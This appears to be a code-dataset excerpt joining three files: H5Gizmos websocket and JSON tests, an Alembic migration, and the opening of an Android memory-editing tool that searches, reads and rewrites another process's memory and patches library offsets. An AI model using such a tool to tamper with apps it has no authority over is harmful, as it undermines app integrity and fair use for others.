def process_packet(packet):\n packets_processed.append(packet)\n strings_sent = []\n def awaitable_sender(string):\n strings_sent.append(string)\n packet_limit = 1000000\n auto_flush = True\n P = GizmoPacker(process_packet, awaitable_sender, packet_limit, auto_flush)\n P.on_unicode_message(CONTINUE_UNICODE + \"abc\")\n P.on_unicode_message(FINISHED_UNICODE + \"123\")\n self.assertEqual(packets_processed, ['abc123'])\n\n def test_rejects_bad_chunks(self):\n packets_processed = []\n def process_packet(packet):\n packets_processed.append(packet)\n strings_sent = []\n def awaitable_sender(string):\n strings_sent.append(string)\n packet_limit = 1000000\n auto_flush = True\n P = GizmoPacker(process_packet, awaitable_sender, packet_limit, auto_flush)\n with self.assertRaises(BadMessageIndicator):\n P.on_unicode_message(\"*\" + \"abc\")\n self.assertEqual(packets_processed, [])\n\n def test_processes_json_string(self):\n processed_json = []\n def process_json(json_ob):\n processed_json.append(json_ob)\n sent_unicode = []\n def send_unicode(x):\n sent_unicode.append(x)\n errors = []\n def on_error(msg):\n errors.append(msg)\n codec = JsonCodec(process_json, send_unicode, on_error)\n expected = [\"this\", 1, \"json\"]\n jstring = '[\"this\", 1, \"json\"]'\n codec.receive_unicode(jstring)\n self.assertEqual(processed_json, [expected])\n\n def test_rejects_bad_json_string(self):\n processed_json = []\n def process_json(json_ob):\n processed_json.append(json_ob)\n sent_unicode = []\n def send_unicode(x):\n sent_unicode.append(x)\n errors = []\n def on_error(msg):\n errors.append(msg)\n codec = JsonCodec(process_json, send_unicode, on_error)\n jstring = '[\"this\", 1, \"json]'\n with self.assertRaises(Exception):\n codec.receive_unicode(jstring)\n self.assertEqual(len(errors), 1)\n\n def test_encodes_json_object(self):\n processed_json = []\n def process_json(json_ob):\n processed_json.append(json_ob)\n sent_unicode = []\n def send_unicode(x):\n sent_unicode.append(x)\n errors = []\n def on_error(msg):\n errors.append(msg)\n codec = JsonCodec(process_json, send_unicode, on_error)\n json_ob = [\"this\", 1, \"json\"]\n codec.send_json(json_ob)\n self.assertEqual(len(sent_unicode), 1)\n [ustr] = sent_unicode\n parsed = json.loads(ustr)\n self.assertEqual(parsed, json_ob)\n\n def test_rejects_bad_json_object(self):\n processed_json = []\n def process_json(json_ob):\n processed_json.append(json_ob)\n sent_unicode = []\n def send_unicode(x):\n sent_unicode.append(x)\n errors = []\n def on_error(msg):\n errors.append(msg)\n codec = JsonCodec(process_json, send_unicode, on_error)\n json_ob = [\"this\", 1, \"json\", json]\n with self.assertRaises(Exception):\n codec.send_json(json_ob)\n self.assertEqual(len(errors), 1)\n\nclass TestGizmoAsync(unittest.IsolatedAsyncioTestCase):\n\n async def test_resolves_get(self):\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"two\", 3]\n lit = GizmoLiteral(json_ob, G)\n to_depth = 5\n # pass in the future so we can resolve it in the test case...\n (oid, future) = G._register_future()\n awaitable = lit._get(to_depth, oid=oid, future=future)\n # emulate a resolving send from JS side\n get_response = [GZ.GET, oid, json_ob]\n G._receive(get_response)\n # future should be resolved\n self.assertTrue(future.done())\n result = await awaitable\n self.assertEqual(result, json_ob)\n\n async def test_get_exception(self):\n GW = GizmoWrapper()\n G = GW.G\n exception_data = []\n def on_exception(payload):\n exception_data.append(payload)\n G._on_exception = on_exception\n json_ob = [1, 
\"two\", 3]\n lit = GizmoLiteral(json_ob, G)\n to_depth = 5\n # pass in the future so we can resolve it in the test case...\n (oid, future) = G._register_future()\n awaitable = lit._get(to_depth, oid=oid, future=future)\n # emulate an exception from JS side\n get_response = [GZ.EXCEPTION, \"Fake exception\", oid]\n G._receive(get_response)\n # future should be resolved\n self.assertTrue(future.done())\n # awaitable should raise an error\n with self.assertRaises(JavascriptEvalException):\n result = await awaitable\n self.assertEqual(result, json_ob)\n self.assertEqual(len(exception_data), 1)\n self.assertEqual(exception_data[0][0], \"Fake exception\")\n\n async def test_allocates_future_in_get(self):\n # code coverage hack\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"two\", 3]\n lit = GizmoLiteral(json_ob, G)\n awaitable = lit._get(to_depth=None, oid=None, future=None, test_result=json_ob)\n result = await awaitable\n self.assertEqual(result, json_ob)\n\n async def test_auto_flushes(self):\n packets_processed = []\n def process_packet(packet):\n packets_processed.append(packet)\n strings_sent = []\n async def awaitable_sender(string):\n strings_sent.append(string)\n packet_limit = 4\n auto_flush = True\n P = GizmoPacker(process_packet, awaitable_sender, packet_limit, auto_flush)\n flush_task = P.send_unicode(\"123abc\")\n expect_sends = ['C123a', 'Fbc']\n await flush_task\n self.assertEqual(strings_sent, expect_sends)\n\n async def test_manual_flushes(self):\n packets_processed = []\n def process_packet(packet):\n packets_processed.append(packet)\n strings_sent = []\n async def awaitable_sender(string):\n strings_sent.append(string)\n packet_limit = 4\n auto_flush = False\n P = GizmoPacker(process_packet, awaitable_sender, packet_limit, auto_flush)\n P.flush()\n P.send_unicode(\"123abc\")\n expect_sends = ['C123a', 'Fbc']\n await P.awaitable_flush()\n self.assertEqual(strings_sent, expect_sends)\n\n async def test_pipelines_a_message_sent(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a message to receive from JS\n json_ob = [1, \"json\", None]\n json_msg = exec_msg(_lit(json_ob))\n # Make a \"request\" for that message\n cnx = FakeWebSocketUnicodeMessages([]) # no messages from JS side\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n # Send the request\n G._send(json_msg)\n # wait for the request to go through\n expect_str = FINISHED_UNICODE + json.dumps(json_msg)\n await P.packer.flush_queue_task\n ws = cnx.ws\n self.assertEqual(ws._sent, [expect_str])\n if auto_clear:\n self.assertEqual(P.last_unicode_sent, None)\n else:\n self.assertNotEqual(P.last_unicode_sent, None)\n self.assertEqual(P.last_json_received, None)\n\n async def test_one_request_per_pipeline(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a message to send to JS\n json_ob = [1, \"json\", None]\n json_msg = exec_msg(_lit(json_ob))\n # Make a \"request\" for that message\n cnx = FakeWebSocketUnicodeMessages([]) # no messages from JS side\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n self.assertNotEqual(P.request, None)\n req2 = dummy_request(\"different_id\")\n with self.assertRaises(TooManyRequests):\n await P.handle_websocket_request(req2, cnx.get_web_socket)\n\n async def test_pipelines_a_message_sent_early(self, 
auto_clear=False):\n #p(\"starging early test\")\n GW = GizmoWrapper()\n G = GW.G\n P = GZPipeline(G)\n P.set_auto_flush(True)\n P.auto_clear = auto_clear\n # Make a message to send down to JS\n json_ob = [1, \"json\", None]\n json_msg = exec_msg(_lit(json_ob))\n # Make a \"request\" for that message\n cnx = FakeWebSocketUnicodeMessages([]) # no messages from JS side\n req = dummy_request()\n # Send the request\n #self.assertEqual(P.sender, None)\n #P.send_json(json_msg)\n G._send(json_msg)\n await P.packer.flush_queue_task\n # attach the web socket to the pipeline, after the send\n await P.handle_websocket_request(req, cnx.get_web_socket)\n # wait for the request to go through\n expect_str = FINISHED_UNICODE + json.dumps(json_msg)\n #await P.packer.flush_queue_task\n ws = cnx.ws\n self.assertEqual(ws._sent, [expect_str])\n if auto_clear:\n self.assertEqual(P.last_unicode_sent, None)\n else:\n self.assertNotEqual(P.last_unicode_sent, None)\n\n async def test_pipelines_a_message_sent_clear(self):\n return await self.test_pipelines_a_message_sent(auto_clear=True)\n\n async def xxxtest_async_iterable(self):\n iterable = AsyncIterable(list(\"abc\"))\n async for d in iterable:\n #p(\"data\", d)\n pass\n\nclass AsyncIterable:\n\n def __init__(self, items):\n self.index = 0\n self.items = items\n\n def __aiter__(self):\n return self\n\n async def __anext__(self):\n data = await self.fetch_data()\n if data:\n return data\n else:\n raise StopAsyncIteration\n\n async def fetch_data(self):\n index = self.index\n self.index = index + 1\n try:\n return self.items[index]\n except IndexError:\n return None\n\n\nclass TestGizmoAsyncSend(unittest.IsolatedAsyncioTestCase):\n async def test_pipelines_a_message_received(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n data = []\n def callback_function(*args):\n data.append(args)\n oid = G._register_callback(callback_function)\n arguments = [\"this\", \"argument\", \"list\"]\n json_msg = [GZ.CALLBACK, oid, arguments]\n ws_msg = FINISHED_UNICODE + json.dumps(json_msg)\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a \"request\" with the callback\n cnx = FakeWebSocketUnicodeMessages([ws_msg])\n #async for x in cnx.ws:\n # #p(\"for\", x)\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n # Send the request\n ws = cnx.ws\n self.assertEqual(data, [tuple(arguments)])\n if auto_clear:\n self.assertEqual(P.last_json_received, None)\n else:\n self.assertNotEqual(P.last_json_received, None)\n self.assertEqual(P.last_unicode_sent, None)\n\nclass TestGizmoAsyncSendClear(unittest.IsolatedAsyncioTestCase):\n async def test_pipelines_a_message_received_clear(self, auto_clear=True):\n GW = GizmoWrapper()\n G = GW.G\n data1 = []\n def callback_function(*args):\n #raise IndexError\n if len(data1) > 0:\n raise ValueError\n data1.append(args)\n oid = G._register_callback(callback_function)\n arguments = [\"this\", \"argument\", \"list\"]\n json_msg = [GZ.CALLBACK, oid, arguments]\n ws_msg = FINISHED_UNICODE + json.dumps(json_msg)\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a \"request\" with the callback\n cnx = FakeWebSocketUnicodeMessages([ws_msg])\n #async for x in cnx.ws:\n # #p(\"for\", x)\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n # Send the request\n ws = cnx.ws\n self.assertEqual(data1, [tuple(arguments)])\n if auto_clear:\n self.assertEqual(P.last_json_received, None)\n else:\n 
self.assertNotEqual(P.last_json_received, None)\n self.assertEqual(P.last_unicode_sent, None)\n\nclass TestPipelineJsonErr(unittest.IsolatedAsyncioTestCase):\n async def test_pipelines_json_err(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n ws_msg = FINISHED_UNICODE + \"xxxgarbage^&%\"\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a \"request\" with the callback\n cnx = FakeWebSocketUnicodeMessages([ws_msg])\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n self.assertNotEqual(P.last_json_error, None)\n self.assertNotEqual(P.last_receive_error, None)\n self.assertEqual(P.last_unicode_sent, None)\n self.assertEqual(P.last_json_received, None)\n\nclass TestPipelineWSErr(unittest.IsolatedAsyncioTestCase):\n async def test_pipelines_ws_err(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n ws_msg = FINISHED_UNICODE + \"xxxgarbage^&%\"\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # two error packets cause an assertion error\n cnx = FakeWebSocketUnicodeMessages([ws_msg, ws_msg], msg_type=GZPipeline.MSG_TYPE_ERROR)\n req = dummy_request()\n # attach the web socket to the pipeline\n with self.assertRaises(AssertionError):\n await P.handle_websocket_request(req, cnx.get_web_socket)\n self.assertEqual(P.last_json_error, None)\n self.assertEqual(P.last_receive_error, None)\n self.assertEqual(P.last_unicode_sent, None)\n self.assertEqual(P.last_json_received, None)\n self.assertNotEqual(P.ws_error_message, None)\n","repo_name":"AaronWatters/H5Gizmos","sub_path":"H5Gizmos/python/test/test_H5Gizmos.py","file_name":"test_H5Gizmos.py","file_ext":"py","file_size_in_byte":26572,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"39135286884","text":"\"\"\"Allow languages to be managed on web client\n\nRevision ID: 99381175f30e\nRevises: 38e7afa4efe3\nCreate Date: 2022-05-23 03:27:21.084387\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '99381175f30e'\ndown_revision = '38e7afa4efe3'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('codes', sa.Column('allowed', sa.Boolean(), nullable=True))\n op.add_column('codes', sa.Column('default', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('codes', 'allowed')\n op.drop_column('codes', 'default')\n # ### end Alembic commands ###\n","repo_name":"ryanwhite04/chengyule","sub_path":"migrations/versions/99381175f30e_allow_languages_to_be_managed_on_web_.py","file_name":"99381175f30e_allow_languages_to_be_managed_on_web_.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"21873443902","text":"\"\"\"\r\n/*\r\n * Date : 2023/09/30\r\n * Version : 0.6\r\n * Author : Abdul Moez\r\n * Email : abdulmoez123456789@gmail.com\r\n * Affiliation : Undergraduate at Government College University (GCU) Lahore, Pakistan\r\n * GitHub : https://github.com/Anonym0usWork1221/android-memorytool\r\n *\r\n * Description:\r\n * This code is governed by the GNU General Public License, version 3 or later.\r\n * You should have received a copy of the GNU General Public License\r\n * along with this program. If not, see .\r\n */\r\n\"\"\"\r\n\r\n# ! 
/usr/bin/env python\r\nfrom .additional_features import AdditionalFeatures\r\nfrom .ThreadingController import FastSearchAlgo\r\nfrom .libs_read_writers import LibsControllers\r\nfrom .mapping import Mapping\r\nfrom os import cpu_count\r\n\r\n\r\nclass AndroidMemoryToolLinux(FastSearchAlgo):\r\n \"\"\"\r\n This class represents a tool for performing memory-related operations on an Android device. It inherits from the\r\n FastSearchAlgo class.\r\n\r\n Constructor:\r\n\r\n __init__(self, PKG: any((str, int)), TYPE=FastSearchAlgo.DataTypes.DWORD, SPEED_MODE=True, WORKERS=50,\r\n pMAP=FastSearchAlgo.PMAP()) -> None:\r\n Initializes an instance of the AndroidMemoryTool class. It takes the following parameters:\r\n PKG: Package name or ID of the target process.\r\n TYPE: Data type to be used in memory operations (default: FastSearchAlgo.DataTypes.DWORD).\r\n SPEED_MODE: Flag indicating whether speed mode is enabled (default: True).\r\n WORKERS: Number of worker threads to use in search operations (default: 50).\r\n pMAP: Instance of the PMAP class for memory mapping (default: FastSearchAlgo.PMAP()).\r\n\r\n Methods:\r\n\r\n initialize(self, PKG: any((str, int)), TYPE: str, SPEED_MODE: bool,\r\n WORKERS: int, pMAP: FastSearchAlgo.PMAP) -> None:\r\n Initializes the AndroidMemoryTool instance with the specified parameters.\r\n\r\n read_value(self, read: any) -> any: Reads the value at a given memory address. It takes the following parameter:\r\n read: Memory address to read from.\r\n\r\n read_write_value(self, read: any, write: any) -> any:\r\n Reads the value at a given memory address and then writes a new value to that address.\r\n It takes the following parameters:\r\n read: Memory address to read from.\r\n write: Value to write to the memory address.\r\n\r\n write_lib(self, base_address: hex, offset: hex, write_value: any) -> any:\r\n Writes a value to a specific offset in a shared library. It takes the following parameters:\r\n base_address: Base address of the shared library.\r\n offset: Offset within the shared library.\r\n write_value: Value to write to the specified offset.\r\n\r\n read_lib(self, base_address: hex, offset: hex, value: any((str, int, None)) = None) -> any:\r\n Reads a value from a specific offset in a shared library. It takes the following parameters:\r\n base_address: Base address of the shared library.\r\n offset: Offset within the shared library.\r\n value (optional): Value to use for dynamic buffer size calculation (default: None).\r\n\r\n refiner_address(self, list_address: list, value_to_refine: any) -> any:\r\n Refines a list of memory addresses based on a specific value. It takes the following parameters:\r\n list_address: List of memory addresses to refine.\r\n value_to_refine: Value to refine the addresses based on.\r\n\r\n get_module_base_address(pid: str, module_name: str) -> any:\r\n Retrieves the base address of a specific module within a process. It takes the following parameters:\r\n pid: Process ID.\r\n module_name: Name of the module.\r\n\r\n raw_dump(self, lib_name: str, path='./') -> bool:\r\n Dumps the raw binary contents of a shared library. It takes the following parameters:\r\n lib_name: Name of the shared library.\r\n path (optional): Path to save the binary dump (default: './').\r\n\r\n find_hex_pattern(self, hex_pattern: str) -> any:\r\n Searches for a hexadecimal pattern in the memory of the target process. 
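# Hedged sketch of how a Linux memory tool like this one typically enumerates
# candidate regions before searching: parse /proc/<pid>/maps for readable
# address ranges. The pid value and the r-permission filter are assumptions;
# actual reads would then seek into /proc/<pid>/mem one region at a time.
def readable_regions(pid):
    regions = []
    with open(f"/proc/{pid}/maps") as maps_file:
        for line in maps_file:
            addr_range, perms = line.split()[:2]
            if perms.startswith("r"):  # keep readable mappings only
                start, end = (int(part, 16) for part in addr_range.split("-"))
                regions.append((start, end))
    return regions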
It takes the following parameter:\r\n hex_pattern: Hexadecimal pattern to search for.\r\n\r\n dump_maps(self, path=\"./\") -> bool:\r\n Dumps the memory mapping information of the target process to a file. It takes the following parameter:\r\n path (optional): Path to save the memory mapping file (default: './').\r\n\r\n \"\"\"\r\n _LibControllerObject = LibsControllers()\r\n\r\n def __init__(self, PKG: any((str, int)),\r\n TYPE: str = FastSearchAlgo.DataTypes.DWORD,\r\n SPEED_MODE: bool = True,\r\n WORKERS: int = int(cpu_count() / 2), # half of cores available in operating system\r\n pMAP: FastSearchAlgo.PMAP = FastSearchAlgo.PMAP()\r\n ) -> None:\r\n \"\"\"\r\n _Initializes an instance of the AndroidMemoryTool class. It takes the following parameters:\r\n Args:\r\n PKG: Package name or ID of the target process.\r\n TYPE: Data type to be used in memory operations (default: FastSearchAlgo.DataTypes.DWORD).\r\n SPEED_MODE: Flag indicating whether speed mode is enabled (default: True).\r\n WORKERS: Number of worker threads to use in search operations (default: 50).\r\n pMAP: Instance of the PMAP class for memory mapping (default: FastSearchAlgo.PMAP()).\r\n \"\"\"\r\n super(AndroidMemoryToolLinux, self).__init__()\r\n self._initialize(PKG, TYPE, SPEED_MODE, WORKERS, pMAP)\r\n\r\n def _initialize(self,\r\n PKG: any((str, int)),\r\n TYPE: str,\r\n SPEED_MODE: bool,\r\n WORKERS: int,\r\n pMAP: FastSearchAlgo.PMAP\r\n ) -> None:\r\n \"\"\"\r\n Initializes the AndroidMemoryTool object.\r\n\r\n Args:\r\n PKG: The package name or process ID.\r\n TYPE: The data type to search for. Defaults to FastSearchAlgo.DataTypes.DWORD.\r\n SPEED_MODE: Whether to enable speed mode. Defaults to True.\r\n WORKERS: The number of workers to use for searching. Defaults to 50.\r\n pMAP: The memory map to use. Defaults to FastSearchAlgo.PMAP().\r\n \"\"\"\r\n\r\n super().init_setup(PKG, TYPE, SPEED_MODE, WORKERS)\r\n super().init_tool(pMAP)\r\n\r\n def read_value(self, read: any, is_grouped: bool = False, range_val: int = 512) -> any:\r\n \"\"\"\r\n Reads the value from the specified memory address.\r\n\r\n Args:\r\n read: The memory address to read from.\r\n is_grouped: Check True if you want group search\r\n range_val: For group search the minimal distance between values\r\n\r\n Returns:\r\n The value read from the memory address.\r\n \"\"\"\r\n\r\n # gets if speed mode is on or off\r\n speed_mode = super().get_variables(is_speed=True)\r\n # gets data type bytes in int\r\n data_types = super().get_variables(is_data_byte=True)\r\n # gets PID of running process\r\n proc_id = super().get_variables(is_pid=True)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n # If data type is valid continue\r\n if data_types != -1:\r\n maps_addr = super().get_variables(is_map_addr=True)\r\n if isinstance(read, list) and is_grouped:\r\n value_to_read = [self.data_type_encoding(value) for value in read]\r\n else:\r\n value_to_read = super().data_type_encoding(read)\r\n\r\n if data_types == 0:\r\n # Perform Group search\r\n if is_grouped:\r\n print(\"[-] This Data Type is not supported for group search. 
Yet!\")\r\n # Perform Normal search\r\n else:\r\n if speed_mode:\r\n super().fast_search_algorithms_text(proc_id, maps_addr, value_to_read)\r\n value = self._SearchAndReadObject.get_readers_values()\r\n self._SearchAndReadObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndReadObject.search_and_read_text(proc_id, maps_addr, value_to_read)\r\n else:\r\n # Perform Group search\r\n if is_grouped:\r\n if speed_mode:\r\n super().fast_group_search_algorithms_value(proc_id, maps_addr, data_types, value_to_read,\r\n range_val)\r\n value = self._SearchAndReadObject.get_readers_values()\r\n self._SearchAndReadObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndReadObject.group_search_and_read(proc_id, maps_addr, data_types,\r\n value_to_read, range_val)\r\n # Perform Normal search\r\n else:\r\n if speed_mode:\r\n super().fast_search_algorithms_value(proc_id, maps_addr, value_to_read,\r\n data_types)\r\n value = self._SearchAndReadObject.get_readers_values()\r\n self._SearchAndReadObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndReadObject.search_and_read(proc_id, maps_addr, data_types, value_to_read)\r\n\r\n return None\r\n\r\n def read_write_value(self, read: any, write: any, is_grouped: bool = False, range_val: int = 552) -> any:\r\n \"\"\"\r\n Reads the value from the specified memory address and writes the new value to it.\r\n\r\n Args:\r\n read: The memory address to read from.\r\n write: The new value to write.\r\n is_grouped: Check True if you want group search.\r\n range_val: For group search the minimal distance between values.\r\n\r\n Returns:\r\n The value written to the memory address.\r\n \"\"\"\r\n\r\n speed_mode = super().get_variables(is_speed=True)\r\n data_types = super().get_variables(is_data_byte=True)\r\n proc_id = super().get_variables(is_pid=True)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n if data_types != -1:\r\n maps_addr = super().get_variables(is_map_addr=True)\r\n if isinstance(read, list) and is_grouped:\r\n value_to_read = [self.data_type_encoding(value) for value in read]\r\n _, value_to_write = super().data_type_encoding(read[0], write)\r\n else:\r\n value_to_read, value_to_write = super().data_type_encoding(read, write)\r\n\r\n if data_types == 0:\r\n # Perform Group search\r\n if is_grouped:\r\n print(\"[-] This Data Type is not supported for group search. 
Yet!\")\r\n # Perform Normal search\r\n else:\r\n if speed_mode:\r\n super().fast_search_algorithms_text(proc_id, maps_addr, value_to_read, value_to_write)\r\n value = self._SearchAndWriteObject.get_writer_values()\r\n self._SearchAndWriteObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndWriteObject.search_and_write_text(proc_id, maps_addr, value_to_read,\r\n value_to_write)\r\n else:\r\n # Perform Group search\r\n if is_grouped:\r\n if speed_mode:\r\n super().fast_group_search_algorithms_value(proc_id, maps_addr, data_types, value_to_read,\r\n range_val, value_to_write)\r\n value = self._SearchAndWriteObject.get_writer_values()\r\n self._SearchAndWriteObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndWriteObject.group_search_and_write(proc_id, maps_addr, data_types,\r\n value_to_read, value_to_write, range_val)\r\n # Perform Normal search\r\n else:\r\n if speed_mode:\r\n super().fast_search_algorithms_value(proc_id, maps_addr, value_to_read,\r\n data_types, value_to_write)\r\n value = self._SearchAndWriteObject.get_writer_values()\r\n self._SearchAndWriteObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndWriteObject.search_and_write(proc_id, maps_addr, data_types, value_to_read,\r\n value_to_write)\r\n return None\r\n\r\n def write_lib(self, base_address: str, offset: str, write_value: any) -> any:\r\n \"\"\"\r\n Writes the value to the specified library offset.\r\n\r\n Args:\r\n base_address: The base address of the library.\r\n offset: The offset within the library.\r\n write_value: The value to write.\r\n\r\n Returns:\r\n The value written to the library offset.\r\n \"\"\"\r\n\r\n data_types = super().get_variables(is_data_byte=True)\r\n proc_id = super().get_variables(is_pid=True)\r\n base_address = str(base_address)\r\n offset = str(offset)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n if data_types != -1:\r\n value_to_write = super().data_type_encoding(write_value)\r\n return self._LibControllerObject.write_lib_offsets(proc_id, base_address, offset, value_to_write)\r\n return None\r\n\r\n def read_lib(self, base_address: str, offset: str, value: any((str, int, None)) = None) -> any:\r\n \"\"\"\r\n Reads the value from the specified library offset.\r\n\r\n Args:\r\n base_address: The base address of the library.\r\n offset: The offset within the library.\r\n value: The additional value parameter for certain data types. 
Defaults to None.\r\n\r\n Returns:\r\n The value read from the library offset.\r\n \"\"\"\r\n\r\n data_types = super().get_variables(is_data_byte=True)\r\n proc_id = super().get_variables(is_pid=True)\r\n base_address = str(base_address)\r\n offset = str(offset)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n if data_types != -1:\r\n if data_types == 0:\r\n if value is None:\r\n print(\"[*] Needed Value parameter\")\r\n return None\r\n\r\n if isinstance(value, int):\r\n buffer = 18 + (2 * int(value))\r\n elif str(value).isnumeric():\r\n buffer = 18 + (2 * int(str(value)))\r\n else:\r\n buffer = 18 + (2 * int(len(str(value))))\r\n\r\n value = self._LibControllerObject.read_lib_offsets(proc_id, base_address, offset, buffer)\r\n if value:\r\n return super().data_type_decoding(value)\r\n\r\n else:\r\n value = self._LibControllerObject.read_lib_offsets(proc_id, base_address, offset, data_types)\r\n if value:\r\n return super().data_type_decoding(value)\r\n return None\r\n\r\n def refiner_address(self, list_address: list, value_to_refine: any) -> any:\r\n \"\"\"\r\n Refines the list of addresses based on the specified value to refine.\r\n\r\n Args:\r\n list_address: The list of addresses to refine.\r\n value_to_refine: The value to refine.\r\n\r\n Returns:\r\n The refined list of addresses.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n data_types = super().get_variables(is_data_byte=True)\r\n value_to_read = super().data_type_encoding(value_to_refine)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n if data_types != -1:\r\n if data_types == 0:\r\n print(\"[*] Data type not supported\")\r\n else:\r\n return self._LibControllerObject.address_refiners(proc_id, list_address, data_types, value_to_read)\r\n return None\r\n\r\n def get_module_base_address(self, module_name: str) -> any:\r\n \"\"\"\r\n Gets the base address of the specified module for the given process ID.\r\n Args:\r\n module_name: The name of the module.\r\n Returns:\r\n The base address of the module.\r\n \"\"\"\r\n\r\n pid = super().get_variables(is_pid=True)\r\n map_file = open(f\"/proc/{pid}/maps\", 'r')\r\n address = []\r\n if map_file is not None:\r\n for line in map_file.readlines():\r\n line_split = line.split()\r\n if module_name in line_split[len(line_split) - 1]:\r\n address.append(line_split[0].split('-'))\r\n if len(address) < 1:\r\n print(\"[*] Module not found\")\r\n return None\r\n base_address = hex(int(address[0][0], 16))\r\n return base_address\r\n\r\n def raw_dump(self, lib_name: str, path='./') -> bool:\r\n \"\"\"\r\n Dumps the specified library to a raw binary file.\r\n\r\n Args:\r\n lib_name: The name of the library.\r\n path: The path to save the dumped file. 
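# get_module_base_address above scans /proc/<pid>/maps for lines whose last
# field names the module and keeps the low end of the first matching range.
# The same parsing applied to one literal maps line (the line is made up):
line = "7f2a1c000000-7f2a1c200000 r-xp 00000000 08:01 131 /usr/lib/libdemo.so"
fields = line.split()
if "libdemo.so" in fields[-1]:
    start, _end = fields[0].split("-")
    print(hex(int(start, 16)))   # 0x7f2a1c000000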
Defaults to './'.\r\n\r\n Returns:\r\n True if the dump was successful, False otherwise.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n\r\n if \"-\" in lib_name:\r\n address = lib_name.split(\"-\")\r\n else:\r\n address = Mapping.mapping_dump_libs(proc_id, lib_name)\r\n\r\n if len(address) < 1:\r\n print(\"[*] Module not found\")\r\n return False\r\n\r\n binary_string = self._LibControllerObject.raw_dumper(proc_id, address)\r\n open(f\"{path}{address[0][0]}-{address[len(address) - 1][1]}-{lib_name.replace('.so', '')}.bin\", 'wb') \\\r\n .write(binary_string)\r\n return True\r\n\r\n def find_hex_pattern(self, search_pattern: str) -> any:\r\n \"\"\"\r\n Finds the specified hexadecimal pattern in the memory.\r\n\r\n Args:\r\n search_pattern: The hexadecimal pattern to search for.\r\n\r\n Returns:\r\n The addresses where the pattern was found.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n maps_addr = super().get_variables(is_map_addr=True)\r\n speed_mode = super().get_variables(is_speed=True)\r\n\r\n filter_user_data = search_pattern.replace(\" \", \"\")\r\n bytes_of_filtered_data = int(len(filter_user_data) / 2)\r\n pattern_of_hex = \"\"\r\n character_counter_hex = 0\r\n for char in filter_user_data:\r\n if char == \"?\":\r\n character_counter_hex += 1\r\n else:\r\n if character_counter_hex != 0:\r\n pattern_of_hex += f\"[A-Fa-f0-9]{{{character_counter_hex}}}\"\r\n character_counter_hex = 0\r\n if char != \"?\":\r\n pattern_of_hex += char\r\n\r\n if character_counter_hex != 0:\r\n pattern_of_hex += f\"[A-Fa-f0-9]{{{character_counter_hex}}}\"\r\n if speed_mode:\r\n super().fast_search_algorithms_pattern_finding(proc_id, maps_addr, bytes_of_filtered_data,\r\n pattern_of_hex)\r\n values = self._AdditionalFeaturesObject.get_pattern_finder_values()\r\n self._AdditionalFeaturesObject.reset_queue()\r\n return values\r\n\r\n return AdditionalFeatures.find_hexadecimal_pattern(proc_id, maps_addr, bytes_of_filtered_data, pattern_of_hex)\r\n\r\n def find_and_replace_hex_pattern(self, search_pattern: str, replace_pattern: str) -> any:\r\n \"\"\"\r\n Finds and replaces a hexadecimal pattern in memory addresses.\r\n\r\n Args:\r\n search_pattern (str): The pattern to search for. It can contain hexadecimal digits (0-9, A-F)\r\n and '?' 
